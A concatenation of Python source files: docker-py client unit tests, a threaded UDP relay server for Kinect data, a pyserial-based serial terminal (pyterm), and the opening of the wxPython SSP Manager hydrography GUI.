if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
class DockerApiTest(DockerClientTest):
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
docker.Client(version=1.12)
self.assertEqual(
str(excinfo.value),
'Version parameter must be a string or None. Found float'
)
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/somename/world')
)
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'hello/somename/world/someothername')
)
url = self.client._url('/hello/{0}/world', 'some?name')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/some%3Fname/world')
)
url = self.client._url("/images/{0}/push", "localhost:5000/image")
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'images/localhost:5000/image/push')
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
self.assertEqual(url, '{0}{1}'.format(url_prefix, 'simple'))
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
self.assertEqual(
url, '{0}{1}'.format(url_base, 'hello/somename/world')
)
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
TypeError, self.client.create_host_config, security_opt='wrong'
)
def test_stream_helper_decoding(self):
status_code, content = fake_api.fake_responses[url_prefix + 'events']()
content_str = json.dumps(content)
if six.PY3:
content_str = content_str.encode('utf-8')
body = io.BytesIO(content_str)
# mock a stream interface
raw_resp = urllib3.HTTPResponse(body=body)
setattr(raw_resp._fp, 'chunked', True)
setattr(raw_resp._fp, 'chunk_left', len(body.getvalue()) - 1)
# pass `decode=False` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
self.assertEqual(result, content_str)
# pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
self.assertEqual(result, content)
# non-chunked response, pass `decode=False` to the helper
setattr(raw_resp._fp, 'chunked', False)
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
self.assertEqual(result, content_str.decode('utf-8'))
# non-chunked response, pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
self.assertEqual(result, content)
class StreamTest(base.Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
@pytest.mark.skipif(
docker.constants.IS_WINDOWS_PLATFORM, reason='Unix only'
)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
class UserAgentTest(base.BaseTestCase):
def setUp(self):
self.patcher = mock.patch.object(
docker.Client,
'send',
return_value=fake_resp("GET", "%s/version" % fake_api.prefix)
)
self.mock_send = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_default_user_agent(self):
client = docker.Client()
client.version()
self.assertEqual(self.mock_send.call_count, 1)
headers = self.mock_send.call_args[0][0].headers
expected = 'docker-py/%s' % docker.__version__
self.assertEqual(headers['User-Agent'], expected)
def test_custom_user_agent(self):
client = docker.Client(user_agent='foo/bar')
client.version()
self.assertEqual(self.mock_send.call_count, 1)
headers = self.mock_send.call_args[0][0].headers
self.assertEqual(headers['User-Agent'], 'foo/bar')
|
KinectServerThreaded.py
|
import socket
import sys
import threading
# Create a list to hold all client objects
ProviderList = []
ReceiverList = []
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind the socket to the port
server_address = ('0.0.0.0', 1935)
print(sys.stderr, 'starting up on %s port %s' % server_address)
sock.bind(server_address)
class Receiver(object):
def __init__(self, name, address, subscription):
self.name = name
self.address = address
self.subscription = subscription
class Provider(object):
def __init__(self, name, address, configuration):
self.name = name
self.address = address
self.configuration = configuration
def process_message(data, address):
#print(sys.stderr, 'received %s from %s' % (data, address))
#print(sys.stderr, data)
split = data.decode().split("|")
if (split[0] == "JOIN"):
# Add the new client to the client dictionary (Should replace none with something else by default...)
if (split[1] == "PROVIDER"):
ProviderList.append(Provider(split[2], address, split[3]))
print("Provider %s joined the server" % (split[2]))
elif(split[1] == "RECEIVER"):
target = Provider('none', '0.0.0.0', 'none')
ReceiverList.append(Receiver(split[2], address, target))
print("Receiver %s joined the server" % (split[2]))
# Confirm to the new client that they're joined
message = "CONFIRM|JOIN|" + split[1] + "|" + split[2]+ "|"
sock.sendto(message.encode(), address)
# Notify all clients of the new user
message = "NOTICE|JOIN|" + split[1] + "|" + split[2]+ "|"
for receiver in ReceiverList:
sock.sendto(message.encode(), receiver.address)
elif (split[0] == "LEAVE"):
# Remove the client from the client dictionary
if(split[1] == "PROVIDER"):
for provider in ProviderList:
if(provider.name == split[2] and provider.address == address):
ProviderList.remove(provider)
print("Provider %s left the server" % (split[2]))
elif(split[1] == "RECEIVER"):
for receiver in ReceiverList:
if(receiver.name == split[2] and receiver.address == address):
ReceiverList.remove(receiver)
print("Receiver %s left the server" % (split[2]))
# Confirm to the client that they're removed
message = "CONFIRM|LEAVE|" + split[1] + "|" + split[2]+ "|"
sock.sendto(message.encode(), address)
# Notify everyone about the removed client
message = "NOTICE|LEAVE|" + split[1] + "|" + split[2]+ "|"
for provider in ProviderList:
sock.sendto(message.encode(), provider.address)
for receiver in ReceiverList:
sock.sendto(message.encode(), receiver.address)
elif (split[0] == "SUBSCRIBE"):
target = Provider('none', '0.0.0.0', 'none')
# Find the target provider in the provider dictionary
for provider in ProviderList:
if(provider.name == split[1]):
target = provider
# Find the receiver in the receiver dictionary and set their subscription target
for receiver in ReceiverList:
if(receiver.name == split[2] and receiver.address == address):
receiver.subscription = target
print("Receiver %s has subscribed to the provider %s" % (receiver.name, receiver.subscription.name))
# Confirm to the receiver that they're subscribed
message = "CONFIRM|SUBSCRIBE|" + split[1] + "|" + split[2]+ "|" + target.configuration
sock.sendto(message.encode(), address)
elif (split[0] == "UNSUBSCRIBE"):
target = Provider('none', '0.0.0.0', 'none')
# Find the receiver in the receiver dictionary and set their subscription target
for receiver in ReceiverList:
if(receiver.name == split[2] and receiver.address == address):
receiver.subscription = target
print("Receiver %s has unsubscribed from its provider" % (split[2]))
# Confirm to the receiver that they're subscribed
message = "CONFIRM|UNSUBSCRIBE|" + split[2] + "|"
sock.sendto(message.encode(), address)
elif (split[0] == "PROVIDE"):
# Verify that the source provider and address is registered
for provider in ProviderList:
if(provider.name == split[1] and provider.address == address):
# Confirm to the provider that the frame was recieved
message = "CONFIRM|PROVIDE|" + split[1] + "|" + split[2]+ "|" + split[4]+ "|"
sock.sendto(message.encode(), address)
# Forward the frame to all recipients subscribed to the provider
message = "NOTICE|PROVIDE|" + split[1] + "|" + split[2]+ "|" + split[3]+ "|" + split[4]+ "|" + split[5]+ "|"
for receiver in ReceiverList:
if(receiver.subscription.name == provider.name):
threading.Thread(target = sock.sendto, args=(message.encode(), receiver.address,)).start()
def listen_for_messages():
while True:
data, address = sock.recvfrom(50000)
threading.Thread(target = process_message, args=(data,address,)).start()
mainloop = threading.Thread(target=listen_for_messages, args=())
mainloop.start()
mainloop.join()
|
pyterm.py
|
#!/usr/bin/env python3
"""Simple Python serial terminal
"""
# Copyright (c) 2010-2018, Emmanuel Blot <emmanuel.blot@free.fr>
# Copyright (c) 2016, Emmanuel Bouaziz <ebouaziz@free.fr>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Neotion nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL NEOTION BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from argparse import ArgumentParser, FileType
from array import array
from atexit import register
from collections import deque
from io import TextIOBase
from logging import Formatter, DEBUG, ERROR, FATAL
from logging.handlers import SysLogHandler, WatchedFileHandler, SYSLOG_UDP_PORT
from os import devnull, fstat, isatty, linesep, name as osname, stat, uname
from os.path import abspath
from socket import gethostbyname
from sys import exit, modules, platform, stderr, stdin, stdout, __stdout__
from time import sleep
from threading import Event, Thread
from traceback import format_exc
from _thread import interrupt_main
mswin = platform == 'win32'
if not mswin:
from termios import TCSANOW, tcgetattr, tcsetattr
import local
from pyftdi import FtdiLogger
from tde.filterlog import get_term_formatter
from tde.misc import get_time_logger, to_int
from tde.term import getkey, is_term
# pylint: disable-msg=broad-except
# pylint: disable-msg=too-many-instance-attributes,too-many-arguments
# pylint: disable-msg=too-few-public-methods,too-many-branches
# pylint: disable-msg=too-many-nested-blocks
class MiniTerm:
"""A mini serial terminal to demonstrate pyserial extensions"""
DEFAULT_BAUDRATE = 115200
def __init__(self, device, baudrate=None, parity=None, rtscts=False,
logfilter=False, logfile=None, filelog=None, syslog=None,
debug=False):
self._termstates = []
self._out = stdout
if not mswin and self._out.isatty():
fds = [fd.fileno() for fd in (stdin, stdout, stderr)]
self._termstates = [(fd, tcgetattr(fd) if isatty(fd) else None)
for fd in fds]
self._device = device
self._baudrate = baudrate or self.DEFAULT_BAUDRATE
self._resume = False
self._silent = False
self._rxq = deque()
self._rxe = Event()
self._debug = debug
self._log = self._get_logger(filelog, syslog)
self._logfile = (None, None)
self._logfilter = logfilter
self._filterbuf = bytearray()
self._port = self._open_port(self._device, self._baudrate, parity,
rtscts, debug)
if logfile:
self._logfile_init(logfile)
register(self._cleanup)
def run(self, fullmode=False, loopback=False, silent=False,
localecho=False, autocr=False):
"""Switch to a pure serial terminal application"""
# wait forever, although Windows is stupid and does not signal Ctrl+C,
# so wait use a 1/2-second timeout that gives some time to check for a
# Ctrl+C break then polls again...
print('Entering minicom mode')
self._out.flush()
self._set_silent(silent)
self._port.timeout = 0.5
self._resume = True
# start the reader (target to host direction) within a dedicated thread
args = [loopback]
if self._device.startswith('ftdi://'):
# with pyftdi/pyusb/libusb stack, there is no kernel buffering
# which means that a UART source with data burst may overflow the
# FTDI HW buffer while the SW stack is dealing with formatting
# and console output. Use an intermediate thread to pop out data
# out from the HW as soon as it is made available, and use a deque
# to serve the actual reader thread
args.append(self._get_from_source)
sourcer = Thread(target=self._sourcer)
sourcer.setDaemon(1)
sourcer.start()
else:
# regular kernel buffered device
args.append(self._get_from_port)
reader = Thread(target=self._reader, args=tuple(args))
reader.setDaemon(1)
reader.start()
# start the writer (host to target direction)
self._writer(fullmode, silent, localecho, autocr)
def pulse_dtr(self, delay):
"""Generate a pulse on DTR, which may be associated w/ HW reset."""
if self._port:
self._port.dtr = True
sleep(delay)
self._port.dtr = False
def _sourcer(self):
try:
while self._resume:
data = self._port.read(4096)
if not data:
continue
self._rxq.append(data)
self._rxe.set()
except Exception as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
def _get_from_source(self):
while not self._rxq and self._resume:
if self._rxe.wait(0.1):
self._rxe.clear()
break
if not self._rxq:
return array('B')
return self._rxq.popleft()
def _get_from_port(self):
try:
return self._port.read(4096)
except OSError as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
except Exception as ex:
print(str(ex), file=stderr)
return array('B')
def _reader(self, loopback, getfunc):
"""Loop forever, processing received serial data in terminal mode"""
if self._logfilter:
self._logfilter.start()
try:
# Try to read as many bytes as possible at once, and use a short
# timeout to avoid blocking for more data
self._port.timeout = 0.050
while self._resume:
data = getfunc()
if data:
if self._logfile[0]:
self._logfile_reopen_if_needed()
self._logfile[0].write(data)
if b'\n' in data:
self._logfile[0].flush()
if self._logfilter:
start = 0
while True:
pos = data[start:].find(b'\n')
if pos != -1:
pos += start
self._filterbuf += data[start:pos]
try:
self._logfilter.inject(self._filterbuf,
self._log)
except AttributeError:
# Special case: on abort, _logfilter is
# reset; stop injection in this case
if self._logfilter:
raise
break
except Exception as ex:
print('[INTERNAL] Filtering error with '
'string: %s' % ex, file=stderr)
print(' ', self._filterbuf.decode(
'utf8', errors='ignore'), file=stderr)
if self._debug:
print(format_exc(), file=stderr)
self._filterbuf = bytearray()
start = pos+1
else:
self._filterbuf += data[start:]
break
continue
logstr = data.decode('utf8', errors='replace')
self._out.write(logstr)
self._out.flush()
if self._log:
self._log.info(logstr.rstrip())
if loopback:
self._port.write(data)
except KeyboardInterrupt:
return
except Exception as exc:
print("Exception: %s" % exc)
if self._debug:
print(format_exc(chain=False), file=stderr)
interrupt_main()
def _writer(self, fullmode, silent, localecho, crlf=0):
"""Loop and copy console->serial until EOF character is found"""
while self._resume:
try:
inc = getkey(fullmode)
if not inc:
sleep(0.1)
continue
if mswin:
if ord(inc) == 0x3:
raise KeyboardInterrupt()
if fullmode and ord(inc) == 0x2: # Ctrl+B
self._cleanup()
return
if silent:
if ord(inc) == 0x6: # Ctrl+F
self._set_silent(True)
print('Silent\n')
continue
if ord(inc) == 0x7: # Ctrl+G
self._set_silent(False)
print('Reg\n')
continue
else:
if localecho:
self._out.write(inc.decode('utf8', errors='replace'))
self._out.flush()
if crlf:
if inc == b'\n':
self._port.write(b'\r')
if crlf > 1:
continue
self._port.write(inc)
except KeyboardInterrupt:
if fullmode:
continue
print('%sAborting...' % linesep)
self._cleanup()
return
def _cleanup(self):
"""Cleanup resource before exiting"""
try:
self._resume = False
if self._logfilter:
self._logfilter.stop()
if self._port:
# wait till the other thread completes
sleep(0.5)
try:
rem = self._port.inWaiting()
except IOError:
# maybe a bug in underlying wrapper...
rem = 0
# consumes all the received bytes
for _ in range(rem):
self._port.read()
self._port.close()
self._port = None
print('Bye.')
for tfd, att in self._termstates:
if att is not None:
tcsetattr(tfd, TCSANOW, att)
except Exception as ex:
print(str(ex), file=stderr)
def _set_silent(self, enable):
if bool(self._silent) == bool(enable):
return
if enable:
null = open(devnull, 'w')
self._out = null
elif self._out != __stdout__:
self._out.close()
self._out = __stdout__
if self._logfilter:
self._logfilter.set_output(self._out)
def _get_logger(self, filelog, syslog):
logger = get_time_logger('tde.pyterm')
loglevel = FATAL
if filelog and filelog[0]:
logfile, formatter, level = filelog
handler = WatchedFileHandler(logfile)
handler.setFormatter(formatter)
handler.setLevel(level)
logger.addHandler(handler)
loglevel = min(loglevel, level)
if syslog and syslog[0]:
sysdesc, level = syslog
handler, formatter = self._create_syslog(sysdesc)
# not sure why this character is needed as a start of message
handler.ident = ':'
handler.setFormatter(formatter)
handler.setLevel(level)
logger.addHandler(handler)
loglevel = min(loglevel, level)
logger.setLevel(loglevel)
return logger
@staticmethod
def _create_syslog(syslog):
logargs = syslog.split(':')
try:
facility = getattr(SysLogHandler, 'LOG_%s' % logargs[0].upper())
except AttributeError:
raise RuntimeError('Invalid facility: %s' % logargs[0])
host = logargs[1] if len(logargs) > 1 else 'localhost'
try:
if len(logargs) > 2 and logargs[2]:
port = int(logargs[2])
else:
port = SYSLOG_UDP_PORT
except (ValueError, TypeError):
raise RuntimeError('Invalid syslog port')
try:
addr = gethostbyname(host)
except OSError:
raise RuntimeError('Invalid syslog host')
if len(logargs) > 3 and logargs[3]:
remotefmt = logargs[3].strip("'")
else:
remotefmt = r'%(message)s'
return (SysLogHandler(address=(addr, port), facility=facility),
Formatter(remotefmt))
@staticmethod
def _open_port(device, baudrate, parity, rtscts, debug=False):
"""Open the serial communication port"""
try:
from serial.serialutil import SerialException
from serial import PARITY_NONE
except ImportError:
raise ImportError("Python serial module not installed")
try:
from serial import serial_for_url, VERSION as serialver
version = tuple([int(x) for x in serialver.split('.')])
if version < (2, 6):
raise ValueError
except (ValueError, IndexError, ImportError):
raise ImportError("pyserial 2.6+ is required")
# the following import enables serial protocol extensions
if device.startswith('ftdi:'):
try:
from pyftdi import serialext
serialext.touch()
except ImportError:
raise ImportError("PyFTDI module not installed")
try:
port = serial_for_url(device,
baudrate=baudrate,
parity=parity or PARITY_NONE,
rtscts=rtscts,
timeout=0)
if not port.is_open:
port.open()
if not port.is_open:
raise IOError('Cannot open port "%s"' % device)
if debug:
backend = port.BACKEND if hasattr(port, 'BACKEND') else '?'
print("Using serial backend '%s'" % backend)
return port
except SerialException as exc:
raise IOError(str(exc))
def _logfile_init(self, logfile):
filepath = abspath(logfile.name)
self._logfile = (logfile, filepath)
self._logfile_statstream()
def _logfile_statstream(self):
fst = self._logfile[0]
if fst:
sres = fstat(fst.fileno())
self._logfile = (fst, self._logfile[1], sres.st_dev, sres.st_ino)
def _logfile_reopen_if_needed(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
stream = self._logfile[0]
if not stream:
return
try:
# stat the file by path, checking for existence
sres = stat(self._logfile[1])
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
fdev, fino = self._logfile[2:]
if not sres or sres.st_dev != fdev or sres.st_ino != fino:
if stream is not None:
mode = 'wt' if isinstance(stream, TextIOBase) else 'wb'
stream.flush()
stream.close()
stream = None
filepath = self._logfile[1]
stream = open(filepath, mode)
self._logfile = (stream, filepath)
self._logfile_statstream()
def get_default_device():
"""Get default serial port for the current host OS.
"""
if osname == 'nt':
device = 'COM1'
elif osname == 'posix':
(system, _, _, _, _) = uname()
if system.lower() == 'darwin':
device = '/dev/cu.usbserial'
else:
device = '/dev/ttyS0'
try:
stat(device)
except OSError:
device = 'ftdi:///1'
else:
device = None
return device
def main():
"""Main routine"""
debug = False
try:
default_device = get_default_device()
argparser = ArgumentParser(description=modules[__name__].__doc__)
if osname in ('posix', ):
argparser.add_argument('-f', '--fullmode', dest='fullmode',
action='store_true',
help='use full terminal mode, exit with '
'[Ctrl]+B')
argparser.add_argument('-p', '--device', default=default_device,
help='serial port device name (default: %s)' %
default_device)
argparser.add_argument('-b', '--baudrate',
help='serial port baudrate (default: %d)' %
MiniTerm.DEFAULT_BAUDRATE,
default='%s' % MiniTerm.DEFAULT_BAUDRATE)
argparser.add_argument('-w', '--hwflow',
action='store_true',
help='hardware flow control')
argparser.add_argument('-P', '--pdelay', type=float,
help='pulse DTR at start-up (delay in seconds)')
argparser.add_argument('-e', '--localecho',
action='store_true',
help='local echo mode (print all typed chars)')
argparser.add_argument('-r', '--crlf',
action='count', default=0,
help='prefix LF with CR char, use twice to '
'replace all LF with CR chars')
argparser.add_argument('-l', '--loopback',
action='store_true',
help='loopback mode (send back all received '
'chars)')
argparser.add_argument('-T', '--reltime', action='store_true',
help='show relative time, not host time')
argparser.add_argument('-o', '--rawlog', type=FileType('wb'),
help='output (unformatted) log file')
argparser.add_argument('-O', '--logfile',
help='output formatted, rotatable log file')
argparser.add_argument('-y', '--syslog',
help='push log to syslog daemon '
'facility:[host[:port[:format]]]')
argparser.add_argument('-g', '--filterlog', action='store_true',
help='enable filter log feature, flip-flop with'
' [Ctrl]+G')
argparser.add_argument('-c', '--color', action='store_true',
help='show available colors and exit')
argparser.add_argument('-s', '--silent', action='store_true',
help='silent mode')
argparser.add_argument('-v', '--verbose', action='count', default=0,
help='increase verbosity')
argparser.add_argument('-d', '--debug', action='store_true',
help='enable debug mode')
args = argparser.parse_args()
debug = args.debug
if args.color:
fmtcls = get_term_formatter(not is_term())
fmtcls(stdout, None).show_colors()
exit(0)
if not args.device:
argparser.error('Serial device not specified')
loglevel = max(DEBUG, ERROR - (10 * (args.verbose or 0)))
loglevel = min(ERROR, loglevel)
localfmt = Formatter('%(levelname)s %(asctime)s.%(msecs)03d '
'%(message)s', '%H:%M:%S')
FtdiLogger.set_formatter(localfmt)
FtdiLogger.set_level(loglevel if args.verbose > 3 else ERROR)
if args.filterlog:
fmtcls = get_term_formatter(not is_term())
logfilter = fmtcls(stdout, None,
basetime=-1 if args.reltime else None)
else:
logfilter = None
miniterm = MiniTerm(device=args.device,
baudrate=to_int(args.baudrate),
parity='N',
rtscts=args.hwflow,
logfilter=logfilter,
logfile=args.rawlog,
filelog=(args.logfile, localfmt, loglevel),
syslog=(args.syslog, loglevel),
debug=args.debug)
if args.pdelay:
miniterm.pulse_dtr(args.pdelay)
miniterm.run(args.fullmode, args.loopback, args.silent, args.localecho,
args.crlf)
except (IOError, ValueError) as exc:
print('\nError: %s' % exc, file=stderr)
if debug:
print(format_exc(chain=False), file=stderr)
exit(1)
except KeyboardInterrupt:
exit(2)
if __name__ == '__main__':
main()
|
sspmanager.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import math
import socket
import datetime as dt
import threading
import time
import copy
import numpy as np
import matplotlib.patches
import wx
from wx import PyDeadObjectError
from . import wxmpl # local version of this module, since Pydro's one has an issue
import logging
log = logging.getLogger(__name__)
from hydroffice.base.helper import HyOError
from hydroffice.base.timerthread import TimerThread
from hydroffice.base.gdal_aux import GdalAux
from .plots import WxPlots, PlotsSettings
from . import sspmanager_ui
from . import refmonitor
from . import geomonitor
from . import settingsviewer
from . import userinputsviewer
from . import __version__
from . import __license__
from hydroffice.ssp import project
from hydroffice.ssp import oceanography
from hydroffice.ssp.ssp_db import SspDb
from hydroffice.ssp.ssp_dicts import Dicts
from hydroffice.ssp.ssp_collection import SspCollection
from hydroffice.ssp.helper import Helper, SspError
from hydroffice.ssp.atlases.woa09checker import Woa09Checker
from hydroffice.ssp_settings import ssp_settings
class SSPManager(sspmanager_ui.SSPManagerBase):
here = os.path.abspath(os.path.dirname(__file__))
gui_state = {
"OPEN": 0,
"CLOSED": 1,
"SERVER": 2
}
def __init__(self):
sspmanager_ui.SSPManagerBase.__init__(self, None, -1, "")
self.version = __version__
self.license = __license__
# take care of WOA09 atlas
if not Woa09Checker.is_present():
dial = wx.MessageDialog(None, 'The WOA09 atlas (used by some advanced SSP functions)\n'
'was not found!\n\n'
'The required data files (~350MB) can be retrieved by\n'
'downloading this archive:\n'
' ftp.ccom.unh.edu/fromccom/hydroffice/woa09.zip\n'
'and unzipping it into:\n'
' %s\n\n'
'Do you want that I perform this operation for you?\n'
'Internet connection is required!\n'
% Woa09Checker.get_atlases_folder(),
'SSP Manager - WOA09 atlas', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION)
if dial.ShowModal() == wx.ID_YES:
chk = Woa09Checker()
with_woa09 = chk.present
if not with_woa09:
wx.MessageDialog(None, 'Unable to retrieve the WOA09 atlas. You might:\n'
' - download the archive from (anonymous ftp):\n'
' ftp.ccom.unh.edu/fromccom/hydroffice/woa09.zip\n'
' - unzip the archive into:\n'
' %s\n'
' - restart SSP Manager\n'
% Woa09Checker.get_atlases_folder(),
'WOA09 atlas', wx.OK | wx.ICON_QUESTION)
log.info("disabling WOA09 functions")
else:
log.info("disabling WOA09 functions")
with_woa09 = False
else:
with_woa09 = True
with_rtofs = True
# We load WOA09 atlas and attempt the RTOFS atlas (since it requires internet connection)
self.prj = project.Project(with_listeners=True, with_woa09=with_woa09, with_rtofs=with_rtofs)
# check listeners
if not self.prj.has_running_listeners():
msg = 'Kongsberg and/or Sippican and/or MVP network I/O cannot bind to ports.\n' \
'Is there another instance of SSP Manager running already?'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
# check woa09 atlas
if (not self.prj.woa09_atlas_loaded) and with_woa09:
msg = 'Unable to load World Ocean Atlas grid file'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
# check rtofs atlas
if (not self.prj.rtofs_atlas_loaded) and with_rtofs:
msg = 'Unable to load RTOFS atlas.\n' \
'To use RTOFS, Internet connectivity is required (with port 9090 open).\n' \
'RTOFS queries disabled.'
dlg = wx.MessageDialog(None, msg, "Warning", wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
self.status_message = ""
# UI
self.p = PlotsSettings()
self.ref_monitor = None
self.geo_monitor = None
self.settings_viewer = None
self.settings_tool = None
self.inputs_viewer = None
